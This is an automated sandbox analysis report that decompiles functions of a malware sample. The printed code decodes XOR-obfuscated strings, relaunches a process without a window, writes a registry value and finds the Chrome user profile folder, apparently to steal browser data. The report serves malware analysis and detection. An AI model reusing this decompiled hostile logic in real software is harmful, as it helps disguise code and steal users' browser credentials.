                                                                • Opcode Fuzzy Hash: ffbc0d0f34ad12ef5533244f4ef673cc6514503397d71db2691f43a405d05d28
                                                                • Instruction Fuzzy Hash: 7CE0DFB639434127F52432BDFC42F9A314687A0F50F60083EB6C8C90C5EED180410411
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 010A5763, Relevance: 52.6, APIs: 6, Strings: 24, Instructions: 110libraryprocessloaderCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 90%
                                                                			E010A5763() {
				char _v1048;
				char _v1568;
				char _v1636;
				char _v1640;
				void* _v1644;
				char _v1660;
				char _v1664;
				void* _v1676;
				short _v1678;
				void* _v1680;
				intOrPtr _v1684;
				intOrPtr _v1688;
				intOrPtr _v1692;
				intOrPtr _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				intOrPtr _v1708;
				intOrPtr _v1712;
				intOrPtr _v1716;
				intOrPtr _v1720;
				intOrPtr _v1724;
				intOrPtr _v1728;
				intOrPtr _v1732;
				intOrPtr _v1736;
				intOrPtr _v1740;
				intOrPtr _v1744;
				intOrPtr _v1748;
				intOrPtr _v1752;
				intOrPtr _v1756;
				intOrPtr _v1760;
				intOrPtr _v1764;
				intOrPtr _v1768;
				intOrPtr _v1772;
				intOrPtr _v1776;
				intOrPtr _v1780;
				intOrPtr _v1784;
				intOrPtr _v1788;
				intOrPtr _v1792;
				char _v1796;
				void* __edi;
				signed int _t80;
				void* _t84;
				signed int _t90;
				void* _t93;

				_push(_t84);
				_t1 =  &_v1636; // 0x11223420
				E01024A10(_t84, _t1, 0, 0x44);
				_v1796 = 0xe22ce223;
				_v1792 = 0xe26de226;
				asm("stosd");
				_t93 = (_t90 & 0xfffffff8) - 0x704 + 0xc;
				_v1788 = 0xe23de221;
				_v1784 = 0xe267e223;
				_t80 = 0;
				_v1780 = 0xe20ae267;
				asm("stosd");
				_v1776 = 0xe23be26a;
				_v1772 = 0xe223e225;
				_v1768 = 0xe26fe229;
				asm("stosd");
				_v1764 = 0xe27fe261;
				_v1760 = 0xe27de263;
				_v1756 = 0xe27be265;
				asm("stosd");
				_v1752 = 0xe277e267;
				_v1748 = 0xe237e275;
				_v1744 = 0xe26ae27a;
				_v1740 = 0xe270e27c;
				_v1736 = 0xe27fe229;
				_v1732 = 0xe251e253;
				_v1728 = 0xe253e252;
				_v1724 = 0xe25be244;
				_v1720 = 0xe229e246;
				_v1716 = 0xe205e21d;
				_v1712 = 0xe24de24a;
				_v1708 = 0xe229e24c;
				_v1704 = 0xe203e20b;
				_v1700 = 0xe25ee250;
				_v1696 = 0xe253e214;
				_v1692 = 0xe204e25b;
				_v1688 = 0xe255e256;
				_v1684 = 0xe20ae25d;
				_v1680 = 0xe258;
				do {
					_t33 = _t80 - 0x1dc0; // -7616
					 *(_t93 + 0x10 + _t80 * 2) =  *(_t93 + 0x10 + _t80 * 2) ^ _t33;
					_t80 = _t80 + 1;
				} while (_t80 < 0x3b);
				_t40 =  &_v1660; // 0x11223408
				_v1678 = 0;
				_t42 =  &_v1796; // 0x11223380
				E010943E9(_t40, _t42);
				_t43 =  &_v1568; // 0x11223464
				GetModuleFileNameW(0, _t43, 0x104);
				_t45 =  &_v1568; // 0x11223468
				_t46 =  &_v1664; // 0x11223408
				_t65 =  >=  ? _v1664 : _t46;
				_t48 =  &_v1048; // 0x11223670
				E010A543D(_t48, 0x208,  >=  ? _v1664 : _t46, _t45);
				_t49 =  &_v1680; // 0x112233f8
				_t50 =  &_v1640; // 0x11223420
				_t51 =  &_v1048; // 0x11223670
				GetProcAddress(LoadLibraryA("Kernel32.dll"), "CreateProcessW"); // executed
				CreateProcessW(0, _t51, 0, 0, 0, 0x8000000, 0, 0, _t50, _t49); // executed
				CloseHandle(_v1676);
				CloseHandle(_v1680);
				_t54 =  &_v1664; // 0x11223408
				return E01094572(_t54);
			}















































                                                                0x010a5771
                                                                0x010a5774
                                                                0x010a577e
                                                                0x010a5785
                                                                0x010a5794
                                                                0x010a579c
                                                                0x010a579d
                                                                0x010a57a2
                                                                0x010a57aa
                                                                0x010a57b2
                                                                0x010a57b4
                                                                0x010a57bc
                                                                0x010a57bd
                                                                0x010a57c5
                                                                0x010a57cd
                                                                0x010a57d5
                                                                0x010a57d6
                                                                0x010a57de
                                                                0x010a57e6
                                                                0x010a57ee
                                                                0x010a57ef
                                                                0x010a57f7
                                                                0x010a57ff
                                                                0x010a5807
                                                                0x010a580f
                                                                0x010a5817
                                                                0x010a581f
                                                                0x010a5827
                                                                0x010a582f
                                                                0x010a5837
                                                                0x010a583f
                                                                0x010a5847
                                                                0x010a584f
                                                                0x010a5857
                                                                0x010a585f
                                                                0x010a5867
                                                                0x010a586f
                                                                0x010a5877
                                                                0x010a5882
                                                                0x010a588d
                                                                0x010a588d
                                                                0x010a5893
                                                                0x010a5898
                                                                0x010a5899
                                                                0x010a58a0
                                                                0x010a58a7
                                                                0x010a58af
                                                                0x010a58b4
                                                                0x010a58be
                                                                0x010a58c7
                                                                0x010a58d5
                                                                0x010a58dd
                                                                0x010a58e4
                                                                0x010a58ed
                                                                0x010a58fa
                                                                0x010a5902
                                                                0x010a590a
                                                                0x010a591c
                                                                0x010a5936
                                                                0x010a593c
                                                                0x010a594b
                                                                0x010a5954
                                                                0x010a5956
                                                                0x010a5968

                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,11223464,00000104,11223380), ref: 010A58C7
                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,CreateProcessW,00000000,11223670,00000000,00000000,00000000,08000000,00000000,00000000,11223420,112233F8), ref: 010A592F
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A5936
                                                                • CreateProcessW.KERNELBASE ref: 010A593C
                                                                • CloseHandle.KERNEL32(?), ref: 010A594B
                                                                • CloseHandle.KERNEL32(?), ref: 010A5954
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CloseHandle$AddressCreateFileLibraryLoadModuleNameProcProcess
                                                                • String ID: !=$#g$%#$)o$CreateProcessW$D[$F)$JM$Kernel32.dll$L)$P^$RS$SQ$VU$X$]$c}$e{$g$gw$j;$u7$zj$|p
                                                                • API String ID: 2397788181-986300883
                                                                • Opcode ID: 8832d771fe92c22305b0076beb5ad62e7ec5f776573f2e2c4024c946b16e4b2f
                                                                • Instruction ID: 7afec9ae6a3576b995c30bba3f5fe081efb0f34029e8a927a5b4fb6d5c266962
                                                                • Opcode Fuzzy Hash: 8832d771fe92c22305b0076beb5ad62e7ec5f776573f2e2c4024c946b16e4b2f
                                                                • Instruction Fuzzy Hash: BD4128B95087809FD320DF94DA84A9BBBE8FF84740F508A6DF2D88A250D7789509CF53
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 010210E6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77registryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 91%
                                                                			E010210E6() {
				void* _v8;
				void* _v12;
				char _v13;
				intOrPtr _v17;
				char _v21;
				int _v28;
				int _v32;
				char _v48;
				char _v72;
				long _t28;
				long _t34;
				long _t37;
				int _t42;
				void* _t55;

				_push(0xa);
				if(E010AE087(0x10ccfc8, 0, _t55) > 0x12c) {
					E010A47F9( &_v72);
					_t42 = 0;
					_v32 = 0;
					_v28 = 0;
					E01094728( &_v48, 0x10ccef0);
					_v12 = 0;
					_v8 = 0;
					_v21 = 0x17040e13;
					_v17 = 0x2140413;
					_v13 = 0;
					_t28 = RegOpenKeyExA(0x80000002, E01045084( &_v21), 0, 0x20006,  &_v12); // executed
					__eflags = _t28;
					if(_t28 == 0) {
						__eflags =  *0x10ccea4 - 0x10;
						_t33 =  >=  ?  *0x10cce90 : 0x10cce90;
						_t34 = RegCreateKeyA(_v12,  >=  ?  *0x10cce90 : 0x10cce90,  &_v8); // executed
						__eflags = _t34;
						if(_t34 == 0) {
							__eflags = _v28 - 0x10;
							_t53 =  >=  ? _v48 :  &_v48;
							_t42 = 1;
							_t37 = RegSetValueExA(_v8, "name", 0, 1,  >=  ? _v48 :  &_v48, _v32 + 1); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = 0;
								__eflags = 0;
							} else {
								RegCloseKey(_v8);
								RegCloseKey(_v12);
							}
						}
					}
					E01094615( &_v48);
					E01094615( &_v72);
					return _t42;
				} else {
					return 0;
				}
			}

















                                                                0x010210f3
                                                                0x01021100
                                                                0x0102110a
                                                                0x0102110f
                                                                0x01021119
                                                                0x0102111c
                                                                0x0102111f
                                                                0x01021127
                                                                0x01021134
                                                                0x01021137
                                                                0x0102113e
                                                                0x01021145
                                                                0x01021153
                                                                0x01021159
                                                                0x0102115b
                                                                0x0102115d
                                                                0x0102116c
                                                                0x01021178
                                                                0x0102117e
                                                                0x01021180
                                                                0x01021182
                                                                0x0102118c
                                                                0x01021193
                                                                0x0102119f
                                                                0x010211a5
                                                                0x010211a7
                                                                0x010211bd
                                                                0x010211bd
                                                                0x010211a9
                                                                0x010211ac
                                                                0x010211b5
                                                                0x010211b5
                                                                0x010211a7
                                                                0x01021180
                                                                0x010211c2
                                                                0x010211ca
                                                                0x010211d3
                                                                0x01021102
                                                                0x01021105
                                                                0x01021105

                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,00020006,?,010CCEF0), ref: 01021153
                                                                • RegCreateKeyA.ADVAPI32(?,010CCE90,?), ref: 01021178
                                                                • RegSetValueExA.KERNELBASE(?,name,00000000,00000001,?,?), ref: 0102119F
                                                                • RegCloseKey.ADVAPI32(?), ref: 010211AC
                                                                • RegCloseKey.ADVAPI32(?), ref: 010211B5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Close$CreateOpenValue
                                                                • String ID: name
                                                                • API String ID: 678895439-1579384326
                                                                • Opcode ID: b93378b51862a96836777669fb3e5380cf8a50ae92e766a66c07d60f87958ed7
                                                                • Instruction ID: fa9330f4e8e7d7e8b335febe59e8a265f97ccf56c288de5713ce2889776dbe87
                                                                • Opcode Fuzzy Hash: b93378b51862a96836777669fb3e5380cf8a50ae92e766a66c07d60f87958ed7
                                                                • Instruction Fuzzy Hash: B3216D70A40209EFEF24DFE8D995EEEBBB9FB18304F50406CE586A2140EB715A45DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01095671, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 37libraryloaderCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 75%
                                                                			E01095671(void* __edi) {
				char _v524;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t8;
				void* _t9;
				void* _t13;

				E01024A10(__edi,  &_v524, 0, 0x208);
				_t7 = LoadLibraryA("Shell32.dll"); // executed
				_t8 = GetProcAddress(_t7, "SHGetSpecialFolderPathW"); // executed
				_t9 =  *_t8(0,  &_v524, 0x1c, 1); // executed
				if(_t9 != 0) {
					E01096B00(_t13, 0x10d5618, 0x104, L"%s\\Google\\Chrome\\User Data\\Default",  &_v524);
					return 0x10d5618;
				} else {
					return _t9;
				}
			}








                                                                0x01095688
                                                                0x010956a7
                                                                0x010956ae
                                                                0x010956b4
                                                                0x010956b8
                                                                0x010956d4
                                                                0x010956e0
                                                                0x010956bb
                                                                0x010956bb
                                                                0x010956bb

                                                                APIs
                                                                • LoadLibraryA.KERNELBASE(Shell32.dll,SHGetSpecialFolderPathW,00000000,?,0000001C,00000001), ref: 010956A7
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010956AE
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Google\Chrome\User Data\Default, xrefs: 010956C3, 010956D3
                                                                • %s\Google\Chrome\User Data\Default, xrefs: 010956C9
                                                                • SHGetSpecialFolderPathW, xrefs: 0109569D
                                                                • Shell32.dll, xrefs: 010956A2
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: %s\Google\Chrome\User Data\Default$C:\Users\user\AppData\Local\Google\Chrome\User Data\Default$SHGetSpecialFolderPathW$Shell32.dll
                                                                • API String ID: 2574300362-4211305373
                                                                • Opcode ID: 934468eacb9ac387e26c218c4c26e264b4daa7ec16ec6ab29c876b0129396e0e
                                                                • Instruction ID: 5711971e3de7fc3622d01c28d08de8232868b881d69fe4813b591f7875ffa20d
                                                                • Opcode Fuzzy Hash: 934468eacb9ac387e26c218c4c26e264b4daa7ec16ec6ab29c876b0129396e0e
                                                                • Instruction Fuzzy Hash: 41F054B1B8031967EA607264BC0AFDB326C4714A05F400154BAD9F61C6F9D5D6444AD4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 010AE836, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 92%
                                                                			E010AE836(intOrPtr __ecx, void* __edx, void* __eflags) {
				char _v5;
				short _v6;
				intOrPtr _v9;
				intOrPtr _v10;
				intOrPtr _v14;
				char _v18;
				char _v20;
				char _v25;
				char _v28;
				char _v29;
				char _v33;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				char _v112;
				intOrPtr _v116;
				signed int _v120;
				char _v136;
				char _v160;
				void* __ebx;
				void* __edi;
				signed int _t81;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t87;
				intOrPtr _t88;
				intOrPtr _t91;
				void* _t100;
				signed int _t126;
				intOrPtr _t127;
				void* _t128;
				signed int _t132;
				intOrPtr* _t135;
				intOrPtr* _t139;
				char _t142;
				intOrPtr* _t143;
				signed int _t163;
				void* _t170;
				signed int _t171;
				void* _t175;
				intOrPtr _t178;
				void* _t180;
				void* _t181;
				void* _t182;
				intOrPtr _t184;
				intOrPtr _t185;
				void* _t186;

				_t170 = __edx;
				_v40 = __ecx;
				E010AE466( &_v52, __eflags); // executed
				E010AE67A( &_v160, _t170); // executed
				_t178 = _v52;
				_v64 = 0;
				_v60 = 0;
				_v56 = 0;
				_t81 = _v48 - _t178;
				asm("cdq");
				_t132 = 0x18;
				_t171 = _t81 % _t132;
				_t126 = _t81 / _t132;
				_t188 = _t126;
				if(_t126 != 0) {
					_t185 = _t178;
					_t180 = _t132;
					do {
						_v20 = 6;
						E010931DE( &_v20, _t171, _t188, _t185);
						E010A9228( &_v64,  &_v20);
						E010A832E(_t126,  &_v20);
						_t185 = _t185 + _t180;
						_t126 = _t126 - 1;
					} while (_t126 != 0);
					_t178 = _v52;
				}
				_t127 = _v40;
				E010A8186(_t127);
				_v18 = 0x37313833;
				_v14 = 0x22102821;
				_v10 = 0x24233a3a;
				_v6 = 0x22;
				_t84 = E0104515C( &_v18);
				_v120 = _v120 & 0x00000000;
				_t172 = _t84;
				_t135 = _t84;
				_v116 = 0xf;
				_v136 = 0;
				_t29 = _t135 + 1; // 0x1
				_t181 = _t29;
				do {
					_t85 =  *_t135;
					_t135 = _t135 + 1;
				} while (_t85 != 0);
				E01094686( &_v136, _t172, _t135 - _t181);
				_v33 = 0x3021202d;
				_v29 = 0;
				_t87 = E010450F0( &_v33);
				_v96 = _v96 & 0x00000000;
				_t173 = _t87;
				_t139 = _t87;
				_v92 = 0xf;
				_v112 = 0;
				_t38 = _t139 + 1; // 0x1
				_t182 = _t38;
				do {
					_t88 =  *_t139;
					_t139 = _t139 + 1;
				} while (_t88 != 0);
				E01094686( &_v112, _t173, _t139 - _t182);
				asm("movaps xmm0, [0x10bd1d0]");
				asm("movups [ebp-0x15], xmm0");
				_v9 = 0x2137333d;
				_t142 = 0;
				_v5 = 0;
				do {
					_t42 = _t142 + 0x40; // 0x40
					 *(_t186 + _t142 - 0x15) =  *(_t186 + _t142 - 0x15) ^ _t42;
					_t142 = _t142 + 1;
				} while (_t142 < 0x14);
				_t143 =  &_v25;
				_v5 = 0;
				_v72 = 0;
				_v88 = 0;
				_t175 = _t143 + 1;
				_v68 = 0xf;
				do {
					_t91 =  *_t143;
					_t143 = _t143 + 1;
					_t196 = _t91;
				} while (_t91 != 0);
				E01094686( &_v88,  &_v25, _t143 - _t175);
				_t146 =  &_v28;
				_push(E010AE0E2( &_v28, _t196));
				E0109478A(E0109478A(_t127, _t175,  &_v136), _t175, _t146);
				E01094615( &_v28);
				_t100 = E0109478A(_t127, _t175,  &_v112);
				_v20 = 6;
				E010A7C71( &_v20, _t175, _t196,  &_v64);
				E010A900F(_t100, _t175,  &_v20);
				_t154 =  &_v20;
				E010A832E(_t127,  &_v20);
				_push( &_v160);
				E0109478A(E0109478A(_t127, _t175,  &_v88), _t175, _t154);
				E01094615( &_v88);
				E01094615( &_v112);
				E01094615( &_v136);
				E010A8505(_t127,  &_v64, _t178);
				E01094615( &_v160);
				if(_t178 != 0) {
					_t184 = _t178;
					if(_t184 != _v48) {
						_t128 = 0x18;
						do {
							E01094615(_t184);
							_t184 = _t184 + _t128;
						} while (_t184 != _v48);
						_t127 = _v40;
					}
					_t163 = 0x18;
					asm("cdq");
					E01094A9F(_t127, _t178, _t178, (_v44 - _t178) / _t163 * 0x18);
				}
				return _t127;
			}



























































                                                                0x010ae836
                                                                0x010ae841
                                                                0x010ae848
                                                                0x010ae853
                                                                0x010ae858
                                                                0x010ae85d
                                                                0x010ae860
                                                                0x010ae863
                                                                0x010ae869
                                                                0x010ae86d
                                                                0x010ae86e
                                                                0x010ae86f
                                                                0x010ae871
                                                                0x010ae873
                                                                0x010ae875
                                                                0x010ae878
                                                                0x010ae87a
                                                                0x010ae87b
                                                                0x010ae87f
                                                                0x010ae886
                                                                0x010ae892
                                                                0x010ae89a
                                                                0x010ae89f
                                                                0x010ae8a1
                                                                0x010ae8a1
                                                                0x010ae8a6
                                                                0x010ae8a6
                                                                0x010ae8a9
                                                                0x010ae8ae
                                                                0x010ae8b6
                                                                0x010ae8bd
                                                                0x010ae8c4
                                                                0x010ae8cb
                                                                0x010ae8d1
                                                                0x010ae8d6
                                                                0x010ae8da
                                                                0x010ae8dc
                                                                0x010ae8de
                                                                0x010ae8e5
                                                                0x010ae8ec
                                                                0x010ae8ec
                                                                0x010ae8ef
                                                                0x010ae8ef
                                                                0x010ae8f1
                                                                0x010ae8f2
                                                                0x010ae900
                                                                0x010ae908
                                                                0x010ae90f
                                                                0x010ae913
                                                                0x010ae918
                                                                0x010ae91c
                                                                0x010ae91e
                                                                0x010ae920
                                                                0x010ae927
                                                                0x010ae92b
                                                                0x010ae92b
                                                                0x010ae92e
                                                                0x010ae92e
                                                                0x010ae930
                                                                0x010ae931
                                                                0x010ae93c
                                                                0x010ae941
                                                                0x010ae94a
                                                                0x010ae94e
                                                                0x010ae955
                                                                0x010ae957
                                                                0x010ae95a
                                                                0x010ae95a
                                                                0x010ae95d
                                                                0x010ae961
                                                                0x010ae962
                                                                0x010ae967
                                                                0x010ae96a
                                                                0x010ae96d
                                                                0x010ae970
                                                                0x010ae973
                                                                0x010ae976
                                                                0x010ae97d
                                                                0x010ae97d
                                                                0x010ae97f
                                                                0x010ae980
                                                                0x010ae980
                                                                0x010ae98e
                                                                0x010ae993
                                                                0x010ae99b
                                                                0x010ae9ae
                                                                0x010ae9b6
                                                                0x010ae9c1
                                                                0x010ae9c8
                                                                0x010ae9d6
                                                                0x010ae9e1
                                                                0x010ae9e6
                                                                0x010ae9e9
                                                                0x010ae9f4
                                                                0x010aea04
                                                                0x010aea0c
                                                                0x010aea14
                                                                0x010aea1f
                                                                0x010aea27
                                                                0x010aea32
                                                                0x010aea39
                                                                0x010aea3b
                                                                0x010aea40
                                                                0x010aea44
                                                                0x010aea45
                                                                0x010aea47
                                                                0x010aea4c
                                                                0x010aea4e
                                                                0x010aea53
                                                                0x010aea53
                                                                0x010aea5d
                                                                0x010aea5e
                                                                0x010aea66
                                                                0x010aea6c
                                                                0x010aea73

                                                                APIs
                                                                  • Part of subcall function 010AE466: _Deallocate.LIBCONCRT ref: 010AE66C
                                                                  • Part of subcall function 010AE67A: CreateFileW.KERNELBASE(E21DE21C,00000000,00000003,00000000,00000003,00000000,00000000,?,00000000,?), ref: 010AE6F1
                                                                • _Deallocate.LIBCONCRT ref: 010AEA66
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Deallocate$CreateFile
                                                                • String ID: - !0$3817$::#$$=37!
                                                                • API String ID: 3647614243-2413464419
                                                                • Opcode ID: ecd102a452c6f8ba7e7e5ea4fddeb4cbd5d27e5235e2515ab56df18a869eff5c
                                                                • Instruction ID: 641b438420c8bbe68835badbda8eb786c1fa0bdd588ae89177464cf79ebfbb6c
                                                                • Opcode Fuzzy Hash: ecd102a452c6f8ba7e7e5ea4fddeb4cbd5d27e5235e2515ab56df18a869eff5c
                                                                • Instruction Fuzzy Hash: 6361C671D0010A9BDF18EFE8C994AEDB7B9AF58304F50816DD445A7281EF315A09CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01039F9B, Relevance: 4.6, APIs: 3, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 01039FA4
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0103A012
                                                                  • Part of subcall function 01039EB7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01036B39,?,00000000,00000000), ref: 01039F59
                                                                  • Part of subcall function 01035710: RtlAllocateHeap.NTDLL(00000000,010227CC,00000000,?,01024253,00000002,00000000,010A4A32,?,?,01097AEE,010227CC,00000004,00000000,00000000,00000000), ref: 01035742
                                                                • _free.LIBCMT ref: 0103A003
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                • String ID:
                                                                • API String ID: 2560199156-0
                                                                • Opcode ID: 797fb5c7fe3913ca8b973c3c557863a93fa7842891e7b86ff9158ca0e6e11b68
                                                                • Instruction ID: dfe44b6d7d1f6c5d1ea2e9671c06553218f260294e39412cb0ff3fe567c75d02
                                                                • Opcode Fuzzy Hash: 797fb5c7fe3913ca8b973c3c557863a93fa7842891e7b86ff9158ca0e6e11b68
                                                                • Instruction Fuzzy Hash: 4401A7B2B05616BB773155BE5C88DBFADADDED7B543040169FEC4C7200EE668D0191B0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0104B20E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0104B2B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID: winRead
                                                                • API String ID: 2738559852-2759563040
                                                                • Opcode ID: ad67a4a625d8797abf6181b66a1ed2817bf85780d64875405dd92b7afa9590df
                                                                • Instruction ID: 727fbaccd741730a5d7e3237b8d89eca0591f5fd9c52cade8396799c0e1a544b
                                                                • Opcode Fuzzy Hash: ad67a4a625d8797abf6181b66a1ed2817bf85780d64875405dd92b7afa9590df
                                                                • Instruction Fuzzy Hash: 0341BFB2A00209AFDB24DFA8CDC5AEE77B5FF84314F148569F885A7640E730F9458B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0104B19C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 0104B1B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ChangeCloseFindNotification
                                                                • String ID: winClose
                                                                • API String ID: 2591292051-4219828513
                                                                • Opcode ID: 853bbd4b1c2e83f5b1c7369aa0737657eb085aa6c6c2a89f887c541ecb86a77d
                                                                • Instruction ID: de1bf6abc9119a71ac93b680da433308294335c472035bcbfcf673d0eec18655
                                                                • Opcode Fuzzy Hash: 853bbd4b1c2e83f5b1c7369aa0737657eb085aa6c6c2a89f887c541ecb86a77d
                                                                • Instruction Fuzzy Hash: 85F0FC753003066FFB211B6ADD949577FD9EFC45A17044035EACDC2160DB72D8418B50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0103568C, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 010356AD
